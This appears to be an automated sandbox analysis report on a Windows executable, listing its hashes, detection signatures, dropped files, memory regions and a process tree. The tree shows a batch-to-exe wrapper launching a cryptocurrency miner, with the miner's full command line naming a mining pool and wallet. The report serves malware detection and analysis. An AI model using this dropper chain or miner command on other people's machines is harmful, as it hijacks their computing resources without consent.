Analysis

  • max time kernel
    295s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    24-02-2024 03:56

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Users\Admin\AppData\Local\Temp\519A.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\519A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\519A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5582.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3676
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4172

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\519A.tmp\b2e.exe

    Filesize

    18.4MB

    MD5

    f309d46f0e3aabf7331deaa104a9a2a2

    SHA1

    97f445ad2a9960f091ec1cff211afb6480828fce

    SHA256

    dc49807d833bbf75d7e1ecd665e957ecdf4e1e7dfeb27ca12eeb8b75821a67e3

    SHA512

    2f164c939e2c7b16849e58fc604c2f9fd97e3b66df1aab43f6e9ce9ab917466050043229b58f110de601a7ef5555c9bc17e74270d5085f282f5639fb553304c4

  • C:\Users\Admin\AppData\Local\Temp\519A.tmp\b2e.exe

    Filesize

    896KB

    MD5

    1f22d8bf5f6c3dda3e880ea1ba0417d4

    SHA1

    2a8dbf2319999a894714bdea650eb5be32c64c19

    SHA256

    afb7da96abe31529f462178372c48627a7e681e3c18cd2196aec8beee07f5b96

    SHA512

    217b89f6a74039807c135539482b1a769d715190f7756e2b0162a33da3d8ada909b80ca3fc1596e542f163f6a45726282997f4e52a36c352cc89b9e58c1e6e05

  • C:\Users\Admin\AppData\Local\Temp\5582.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    704KB

    MD5

    ce5f200d2d48a057722a957d5acc6426

    SHA1

    e7a8d4c0dc7b561dfa26e3fddaff015716187305

    SHA256

    cb450c8c0a952560f35f4b93f14357fc3856ee0b016eabf8bb4d20e9504d82df

    SHA512

    e7d3b203cc96d08b6d000f6845bbeb5777cd08babadbcb86266193ca68d8183973b3a92f5cf587df1f26bf04a182fa51001b7317c9a9e7ba868d1e26b897ee9b

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    704KB

    MD5

    903e2cfee96d720dd5200a922b637d07

    SHA1

    f6d639d7b6bb586abcb5f97b1b212252ed6c85b2

    SHA256

    443ef0fe0e5e9cff04e267b1bbbbc98b547e5bd38a853eb79d06a43a8e7d17f2

    SHA512

    c9c357be28d1d97bd5255d88bc64255f452867407c3aa4c99b286913286780da1204691a0344514f070b8bad391980a88b165eb1e8e9ee97f77ef02eb85071c2

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    512KB

    MD5

    a5993c0dd7587f1716037dcfe1f63091

    SHA1

    9a4d23ce36f5fc5791692b47d977c0bf92842879

    SHA256

    568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3

    SHA512

    c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    640KB

    MD5

    1bff0defeeb9f4bc5cf01e916a8d1379

    SHA1

    bdb668928be0a339e01e3aeeac813fd26b44b950

    SHA256

    d7f49e1dd346940049b753b856759608013f611624432c7ea57b0872239d35c0

    SHA512

    edb3e22bb4d6f3376d73ccd538a61292c5a086fc8ef9b8038b663c93d9ec991bdca297e3c6febb9d18fd16f5304e4fa532d603c68739598f4b65af320ffb3878

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    512KB

    MD5

    6162b21c54b88c5c990e82aee951ebb4

    SHA1

    477384ab8ebe5f5a5d5a91603736d9ef53c12fd4

    SHA256

    462eb68967c7205145d0b92e4f3b69297f616187b07a189178f35f288063aff4

    SHA512

    6264ee49c4b8a6eaa69241e10ff9ab39445f85a57b756b8bc0530b45d77827d05e669dc06b689d4693db34e4161ef11b2cfe6f1954b0b90bcd434e81a938a40d

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    384KB

    MD5

    4cb3a8d3af58faf78da4dd33a03029db

    SHA1

    5356e4fb04a7047f6fc82a4e071e4803f97a0f3d

    SHA256

    86df790940bd442466ea58a434a31aaaadd1d23a9e9bf5e6fe625ff49049d620

    SHA512

    244237f4a13a7666e9f9592451dbb8bb18ca1f828d66f97e2890fa8f6be690d8890848102a8be253542c9f4b154d9f0e1aeeee5a867c866b78b64f9949f48c89

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    448KB

    MD5

    ca123cec7f705c0af114e462349dc686

    SHA1

    75f90b4d95f6774b2f66e4ba790755ef118ab222

    SHA256

    7f141cdc0be9c965e21310bcfb0484b20d31ffd8a6a970f8b5a53c0e8974798a

    SHA512

    650125faa9ae6733f1118caf3101ca6850473f78f9bfc3a87e908eac1c69935e3bc269ffb5de4dd6e867429c1af35c7f3b9e62eb698fa7c9695d68e7115f3f1c

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    512KB

    MD5

    5fd46a66845c804b88dcd97ffcd66652

    SHA1

    9556ce5607bdd245c8e4d6a24b8217def653f57b

    SHA256

    b7fd85a2268a4d62fa15fde3d9e51d6fa3bc865cb4d8e5fdca309be7b027f193

    SHA512

    0896697d588401a6d29c30e77574ece4f0ba699b082b1bad93964748313a5903eb4994ec81c61bfcbd75f2be3f5200dadda3fd1454381cc5874a9c8952ebeedc

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    384KB

    MD5

    eec15153c344f43f1919cb379b9ee2f9

    SHA1

    3e4a09390ac885ea2797209603bcfa1ec6ff0cc6

    SHA256

    4e4d7ecae87e8e656c61af89ef17146baf33fbf09ffbde6ae971d04e8e8f9222

    SHA512

    7cdf3552341d14979838f8fedf9ac63482152f193ab8f7e0af281ec50b2a43312d78c0e22e79989818c5041538fa69769350e1e6cf0789a165be1eb11ee29908

  • memory/1136-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3496-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3496-8-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4172-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-45-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/4172-46-0x0000000051E10000-0x0000000051EA8000-memory.dmp

    Filesize

    608KB

  • memory/4172-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/4172-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-44-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/4172-54-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB